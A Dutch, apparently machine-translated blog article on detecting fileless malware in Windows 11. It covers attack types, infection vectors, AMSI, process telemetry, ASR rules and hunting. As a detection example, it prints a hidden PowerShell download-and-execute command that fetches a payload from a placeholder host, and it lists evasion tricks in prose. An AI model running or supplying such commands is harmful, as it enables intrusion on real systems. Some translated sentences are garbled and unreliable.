- Bestandsloze malware werkt in het geheugen en misbruikt legitieme processen zoals PowerShell en WMI.
- Voor effectieve detectie is het nodig om gedrag te monitoren en het geheugen te analyseren, niet alleen de bestanden.
- AMSI, procestelemetrie, regels voor oppervlaktereductie en proactief jagen zijn belangrijke functies in Windows 11.
- Persistentie in WMI, Registry en MBR, samen met firmware en USB, vergroot het aanvalsoppervlak.
¿Hoe detecteer je gevaarlijke fileless malware? De activiteit van fileless-aanvallen is aanzienlijk toegenomen, en om de zaken nog erger te maken, Windows 11 is niet immuunDeze aanpak omzeilt de schijf en vertrouwt op geheugen en legitieme systeemtools; daarom hebben antivirusprogramma's op basis van handtekeningen het moeilijk. Als u op zoek bent naar een betrouwbare manier om het te detecteren, ligt het antwoord in de combinatie. telemetrie, gedragsanalyse en Windows-besturingselementen.
In het huidige ecosysteem co-existeren campagnes die PowerShell, WMI of Mshta misbruiken met geavanceerdere technieken zoals geheugeninjecties, persistentie 'zonder de schijf aan te raken' en zelfs firmware misbruikHet belangrijkste is dat u de dreigingskaart, de aanvalsfasen en de signalen die ze achterlaten begrijpt, zelfs als alles zich in het RAM afspeelt.
Wat is fileless malware en waarom is het een probleem in Windows 11?
Als we het over 'bestandsloze' bedreigingen hebben, hebben we het over schadelijke code die U hoeft geen nieuwe uitvoerbare bestanden te deponeren in het bestandssysteem om te werken. Het wordt meestal in actieve processen geïnjecteerd en in het RAM-geheugen uitgevoerd, waarbij gebruik wordt gemaakt van door Microsoft ondertekende interpreters en binaire bestanden (bijv. PowerShell, WMI, rundll32, mshtaHiermee verkleint u uw ecologische voetafdruk en kunt u engines omzeilen die alleen naar verdachte bestanden zoeken.
Zelfs kantoordocumenten of PDF's die kwetsbaarheden misbruiken om opdrachten uit te voeren, worden als onderdeel van het fenomeen beschouwd, omdat uitvoering in het geheugen activeren zonder bruikbare binaire bestanden voor analyse achter te laten. Misbruik van macro's en DDE In Office, aangezien de code in legitieme processen zoals WinWord wordt uitgevoerd.
Aanvallers combineren social engineering (phishing, spamlinks) met technische vallen: de klik van de gebruiker initieert een keten waarin een script de uiteindelijke payload in het geheugen downloadt en uitvoert, vermijden om een spoor achter te laten op de schijf. De doelen variëren van gegevensdiefstal tot de uitvoering van ransomware en stille laterale verplaatsing.

Typologieën per voetafdruk in het systeem: van 'puur' naar hybride
Om verwarrende concepten te voorkomen, is het handig om bedreigingen te scheiden op basis van hun mate van interactie met het bestandssysteem. Deze categorisering verduidelijkt wat blijft bestaan, waar bevindt de code zich en welke signalen laat deze achter?.
Type I: geen bestandsactiviteit
Volledig bestandsloze malware schrijft niets naar schijf. Een klassiek voorbeeld is het misbruiken van een netwerkkwetsbaarheid (zoals de EternalBlue-vector destijds) om een backdoor in het kernelgeheugen te implementeren (zoals DoublePulsar). Hierbij gebeurt alles in het RAM en zijn er geen artefacten in het bestandssysteem.
Een andere optie is om de firmware componenten: BIOS/UEFI, netwerkadapters, USB-randapparatuur (BadUSB-achtige technieken) of zelfs CPU-subsystemen. Ze blijven bestaan na herstarts en herinstallaties, met de extra moeilijkheid dat Weinig producten inspecteren firmwareDit zijn complexe aanvallen, die minder vaak voorkomen, maar wel gevaarlijk zijn vanwege hun stealth en duurzaamheid.
Type II: Indirecte archiveringsactiviteit
Hierbij laat de malware geen eigen uitvoerbaar bestand achter, maar gebruikt hij door het systeem beheerde containers die in wezen als bestanden worden opgeslagen. Bijvoorbeeld backdoors die powershell-opdrachten in de WMI-repository en activeer de uitvoering ervan met gebeurtenisfilters. Het is mogelijk om het vanaf de opdrachtregel te installeren zonder binaire bestanden te verwijderen, maar de WMI-repository bevindt zich op schijf als een legitieme database, waardoor het moeilijk is om deze op te schonen zonder het systeem te beïnvloeden.
Vanuit een praktisch oogpunt worden ze als bestandsloos beschouwd, omdat de container (WMI, Registry, etc.) Het is geen klassiek detecteerbaar uitvoerbaar bestand En het opruimen ervan is niet triviaal. Het resultaat: sluipende persistentie met weinig "traditionele" sporen.
Type III: Heeft bestanden nodig om te functioneren
Sommige gevallen behouden een 'bestandsloze' persistentie Op logisch niveau hebben ze een bestandsgebaseerde trigger nodig. Het typische voorbeeld is Kovter: het registreert een shell-werkwoord voor een willekeurige extensie; wanneer een bestand met die extensie wordt geopend, wordt een klein script met mshta.exe gestart, dat de schadelijke string uit het register reconstrueert.
De truc is dat deze "bait"-bestanden met willekeurige extensies geen analyseerbare payload bevatten en het grootste deel van de code zich in de registratie (een andere container). Daarom worden ze in impact gecategoriseerd als bestandsloos, ook al zijn ze strikt genomen afhankelijk van een of meer schijfartefacten als trigger.
Vectoren en 'gastheren' van infectie: waar het binnenkomt en waar het zich verbergt
Om de detectie te verbeteren, is het essentieel om het toegangspunt en de gastheer van de infectie in kaart te brengen. Dit perspectief helpt bij het ontwerpen specifieke controles Geef prioriteit aan geschikte telemetrie.
exploits
- Bestandsgebaseerd (Type III): Documenten, uitvoerbare bestanden, oudere Flash-/Java-bestanden of LNK-bestanden kunnen de browser of de engine die ze verwerkt, misbruiken om shellcode in het geheugen te laden. De eerste vector is een bestand, maar de payload reist naar het RAM-geheugen.
- Netwerkgebaseerd (Type I): Een pakket dat misbruik maakt van een kwetsbaarheid (bijvoorbeeld in SMB) wordt uitgevoerd in de gebruikersomgeving of kernel. WannaCry heeft deze aanpak gepopulariseerd. Directe geheugenbelasting zonder nieuw bestand.
Hardware
- apparaten (Type I): Firmware van schijf of netwerkkaart kan worden gewijzigd en er kan code worden geïntroduceerd. Moeilijk te inspecteren en blijft buiten het besturingssysteem bestaan.
- CPU en beheersubsystemen (Type I): Technologieën zoals Intel's ME/AMT hebben mogelijkheden getoond om Netwerken en uitvoering buiten het besturingssysteemHet valt op een zeer laag niveau aan, maar heeft een groot stealth-potentieel.
- USB (Type I): Met BadUSB kunt u een USB-stick herprogrammeren, zodat deze een toetsenbord of netwerkkaart imiteert en opdrachten kan uitvoeren of verkeer kan omleiden.
- BIOS / UEFI (Type I): kwaadaardige herprogrammering van de firmware (gevallen zoals Mebromi) die wordt uitgevoerd voordat Windows opstart.
- Hypervisor (Type I): Het implementeren van een mini-hypervisor onder het besturingssysteem om de aanwezigheid ervan te verbergen. Zeldzaam, maar al waargenomen in de vorm van hypervisor-rootkits.
Uitvoering en injectie
- Bestandsgebaseerd (Type III): EXE/DLL/LNK of geplande taken die injecties in legitieme processen starten.
- Macro's (Type III): VBA in Office kan payloads decoderen en uitvoeren, waaronder volledige ransomware, met toestemming van de gebruiker door middel van bedrog.
- Scripts (Type II): PowerShell, VBScript of JScript vanuit bestand, opdrachtregel, diensten, Registratie of WMIDe aanvaller kan het script typen tijdens een externe sessie zonder de schijf aan te raken.
- Opstartrecord (MBR/Boot) (Type II): Families zoals Petya overschrijven de bootsector om de controle over te nemen bij het opstarten. Deze bevindt zich buiten het bestandssysteem, maar is toegankelijk voor het besturingssysteem en moderne oplossingen die deze kunnen herstellen.
Hoe fileless-aanvallen werken: fasen en signalen
Hoewel ze geen uitvoerbare bestanden achterlaten, volgen de campagnes een gefaseerde logica. Inzicht in deze logica maakt monitoring mogelijk. gebeurtenissen en relaties tussen processen die wel sporen achterlaten.
- Eerste toegangPhishingaanvallen via links of bijlagen, gehackte websites of gestolen inloggegevens. Veel ketens beginnen met een Office-document dat een opdracht activeert. PowerShell.
- Persistentie: achterdeurtjes via WMI (filters en abonnementen), Registeruitvoeringssleutels of geplande taken die scripts opnieuw starten zonder een nieuw schadelijk bestand.
- ExfiltratieZodra de informatie is verzameld, wordt deze via vertrouwde processen (browser, PowerShell, bitsadmin) uit het netwerk verzonden om het verkeer te mengen.
Dit patroon is vooral verraderlijk omdat de aanvalsindicatoren Ze verbergen zich in de normale gang van zaken: opdrachtregelargumenten, procesketens, afwijkende uitgaande verbindingen of toegang tot injectie-API's.
Veelgebruikte technieken: van geheugen tot opname
De acteurs vertrouwen op een scala aan methoden die stealth optimaliseren. Het is handig om de meest voorkomende te kennen om effectieve detectie te activeren.
- Inwoner ter nagedachtenis: Het laden van payloads in de ruimte van een vertrouwd proces dat wacht op activering. rootkits en hooks In de kern verhogen ze het niveau van verhulling.
- Persistentie in het registerSla gecodeerde blobs op in sleutels en rehydrateer ze vanuit een legitieme launcher (mshta, rundll32, wscript). De tijdelijke installatie kan zichzelf vernietigen om de voetafdruk te minimaliseren.
- Phishing van inloggegevensMet behulp van gestolen gebruikersnamen en wachtwoorden voert de aanvaller op afstand shells uit en plant stille toegang in het register of WMI.
- 'Bestandsloze' ransomwareEncryptie en C2-communicatie worden vanuit het RAM-geheugen aangestuurd, waardoor de kans op detectie afneemt totdat de schade zichtbaar is.
- Operatiekits: geautomatiseerde ketens die kwetsbaarheden detecteren en alleen-geheugen-payloads implementeren nadat de gebruiker erop klikt.
- Documenten met code: macro's en mechanismen zoals DDE die opdrachten activeren zonder dat uitvoerbare bestanden op schijf worden opgeslagen.
Uit sectoronderzoeken zijn al opmerkelijke pieken gebleken: in één periode van 2018 is een stijging van meer dan 90% bij scriptgebaseerde en PowerShell-ketenaanvallen een teken dat de vector de voorkeur geniet vanwege zijn effectiviteit.
De uitdaging voor bedrijven en leveranciers: waarom blokkeren niet voldoende is
Het zou verleidelijk zijn om PowerShell uit te schakelen of macro's voor altijd te verbieden, maar Je zou de operatie verbrekenPowerShell is een pijler van modern beheer en Office is onmisbaar in het bedrijfsleven; blindelings blokkeren is vaak niet haalbaar.
Bovendien zijn er manieren om basiscontroles te omzeilen: PowerShell uitvoeren via DLL's en rundll32, scripts verpakken in EXE's, Neem uw eigen exemplaar van PowerShell mee of zelfs scripts in afbeeldingen verbergen en ze in het geheugen extraheren. De verdediging kan daarom niet uitsluitend gebaseerd zijn op het ontkennen van het bestaan van tools.
Een andere veelgemaakte fout is het delegeren van de gehele beslissing aan de cloud: als de agent moet wachten op een reactie van de server, Je verliest realtime preventieTelemetriegegevens kunnen worden geüpload om de informatie te verrijken, maar de Mitigatie moet plaatsvinden op het eindpunt.
Hoe u fileless malware in Windows 11 kunt detecteren: telemetrie en gedrag
De winnende strategie is processen en geheugen bewakenGeen bestanden. Kwaadaardig gedrag is stabieler dan de vormen die een bestand aanneemt, waardoor het ideaal is voor preventie-engines.
- AMSI (Antimalware Scan Interface)Het onderschept PowerShell-, VBScript- of JScript-scripts, zelfs wanneer ze dynamisch in het geheugen zijn geconstrueerd. Uitstekend geschikt voor het vastleggen van verborgen strings vóór uitvoering.
- Procesbewaking: start/finish, PID, ouders en kinderen, routes, opdrachtregels en hashes, plus uitvoeringsbomen om het volledige verhaal te begrijpen.
- Geheugenanalyse: detectie van injecties, reflectieve of PE-belastingen zonder de schijf aan te raken en beoordeling van ongebruikelijke uitvoerbare regio's.
- Bescherming van de starterssector: controle en herstel van de MBR/EFI in geval van manipulatie.
In het Microsoft-ecosysteem combineert Defender for Endpoint AMSI, gedragsmonitoringGeheugenscanning en cloudgebaseerde machine learning worden gebruikt om detecties te schalen tegen nieuwe of verborgen varianten. Andere leveranciers hanteren vergelijkbare benaderingen met kernel-residente engines.
Realistisch voorbeeld van correlatie: van document naar PowerShell
Stel je een keten voor waarin Outlook een bijlage downloadt, Word het document opent, actieve inhoud wordt ingeschakeld en PowerShell wordt gestart met verdachte parameters. Goede telemetrie zou de Opdrachtregel (bijv. ExecutionPolicy Bypass, verborgen venster), verbinding maken met een niet-vertrouwd domein en een onderliggend proces maken dat zichzelf in AppData installeert.
Een agent met een lokale context is in staat om stoppen en achteruitrijden Kwaadaardige activiteit zonder handmatige tussenkomst, naast het melden van de SIEM of via e-mail/sms. Sommige producten voegen een laag toe met de hoofdoorzaak (StoryLine-achtige modellen), die niet naar het zichtbare proces (Outlook/Word) verwijst, maar naar de volledige kwaadaardige thread en de oorsprong ervan om het systeem grondig op te schonen.
Een typisch opdrachtpatroon waar u op moet letten, ziet er als volgt uit: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logica is niet de exacte string, maar de reeks signalen: beleid omzeilen, verborgen venster, duidelijke download en uitvoering in het geheugen.
AMSI, pijplijn en rol van elke actor: van eindpunt tot SOC
Naast het vastleggen van scripts orkestreert een robuuste architectuur stappen die onderzoek en reactie vergemakkelijken. Hoe meer bewijsmateriaal er is voordat de opdracht wordt uitgevoerd, hoe beter.Better.
- Script-onderscheppingAMSI levert de inhoud (zelfs als deze on-the-fly wordt gegenereerd) voor statische en dynamische analyse in een malware-pijplijn.
- ProcesgebeurtenissenPID's, binaire bestanden, hashes, routes en andere gegevens worden verzameld. argumenten, het vaststellen van de procesbomen die tot de uiteindelijke lading hebben geleid.
- Detectie en rapportageDe detecties worden weergegeven op de productconsole en doorgestuurd naar netwerkplatforms (NDR) voor visualisatie van de campagne.
- GebruikersgarantiesZelfs als een script in het geheugen wordt geïnjecteerd, blijft het raamwerk AMSI onderschept het in compatibele versies van Windows.
- Beheerdersmogelijkheden: beleidsconfiguratie om scriptinspectie mogelijk te maken, gedragsgebaseerde blokkering en rapporten maken vanaf de console.
- SOC-werk: extractie van artefacten (VM UUID, OS-versie, scripttype, initiatorproces en zijn bovenliggende proces, hashes en opdrachtregels) om de geschiedenis opnieuw te creëren en liftregels toekomst.
Wanneer het platform het exporteren van de geheugenbuffer Door de uitvoering kunnen onderzoekers nieuwe detecties genereren en de verdediging tegen vergelijkbare varianten verbeteren.
Praktische maatregelen in Windows 11: preventie en jacht

Naast EDR met geheugeninspectie en AMSI kunt u met Windows 11 aanvalsruimtes sluiten en de zichtbaarheid ervan verbeteren met native besturingselementen.
- Registratie en beperkingen in PowerShellSchakelt Script Block Logging en Module Logging in, past waar mogelijk beperkte modi toe en beheert het gebruik van Omzeilen/Verborgen.
- Regels voor aanvalsoppervlakvermindering (ASR): blokkeert scriptstarts door Office-processen en WMI-misbruik/PSExec wanneer niet nodig.
- Kantoormacrobeleid: schakelt standaard interne macro-ondertekening en strikte vertrouwenslijsten uit; bewaakt oudere DDE-stromen.
- WMI-audit en -register: bewaakt gebeurtenisabonnementen en automatische uitvoeringssleutels (Run, RunOnce, Winlogon), evenals het aanmaken van taken gepland.
- Opstartbeveiliging: activeert Secure Boot, controleert de integriteit van MBR/EFI en valideert dat er bij het opstarten geen wijzigingen zijn doorgevoerd.
- Reparatie en verharding: sluit kwetsbaarheden die kunnen worden misbruikt in browsers, Office-componenten en netwerkservices.
- bewustzijn: traint gebruikers en technische teams in phishing en signalen van geheime executies.
Voor de jacht, concentreer u op vragen over: het maken van processen door Office richting PowerShell/MSHTA, argumenten met downloadstring/downloadbestandScripts met duidelijke verduistering, reflectieve injecties en uitgaande netwerken naar verdachte TLD's. Kruis deze signalen aan met reputatie en frequentie om ruis te verminderen.
Wat kan elke motor tegenwoordig detecteren?
De bedrijfsoplossingen van Microsoft combineren AMSI, gedragsanalyse, geheugen onderzoeken en bootsectorbeveiliging, plus cloudgebaseerde ML-modellen om te schalen tegen opkomende bedreigingen. Andere leveranciers implementeren monitoring op kernelniveau om kwaadaardige software van onschuldige te onderscheiden met automatische terugdraaiing van wijzigingen.
Een aanpak gebaseerd op executie verhalen Hiermee kunt u de hoofdoorzaak identificeren (bijvoorbeeld een Outlook-bijlage die een keten activeert) en de volledige structuur beperken: scripts, sleutels, taken en tussenliggende binaire bestanden. Zo voorkomt u dat u vastloopt op het zichtbare symptoom.
Veelgemaakte fouten en hoe u ze kunt vermijden

Het blokkeren van PowerShell zonder een alternatief beheerplan is niet alleen onpraktisch, maar er zijn ook manieren om het indirect aan te roepenHetzelfde geldt voor macro's: je beheert ze ofwel met beleid en handtekeningen, anders lijdt het bedrijf eronder. Het is beter om je te concentreren op telemetrie en gedragsregels.
Een andere veelgemaakte fout is de gedachte dat het op een witte lijst zetten van applicaties de oplossing is. Fileless technologie is hier echter juist op gebaseerd. vertrouwde appsDe controleur moet letten op wat ze doen en hoe dat met elkaar samenhangt, niet alleen op de vraag of ze toegestaan zijn.
Met al het bovenstaande houdt fileless malware op een "spook" te zijn als u let op wat er echt toe doet: gedrag, geheugen en oorsprong van elke uitvoering. De combinatie van AMSI, uitgebreide procestelemetrie, native Windows 11-besturingselementen en een EDR-laag met gedragsanalyse geeft u een voorsprong. Voeg daar realistisch beleid voor macro's en PowerShell, WMI/Registry-auditing en een jacht die prioriteit geeft aan opdrachtregels en procesbomen aan toe, en u hebt een verdediging die deze ketens doorbreekt voordat ze ook maar iets laten horen.
Gepassioneerd door technologie sinds hij klein was. Ik houd ervan om op de hoogte te zijn van de sector en vooral om deze te communiceren. Daarom houd ik mij al jaren bezig met communicatie op technologie- en videogamewebsites. Je kunt mij vinden als ik schrijf over Android, Windows, MacOS, iOS, Nintendo of elk ander gerelateerd onderwerp dat in je opkomt.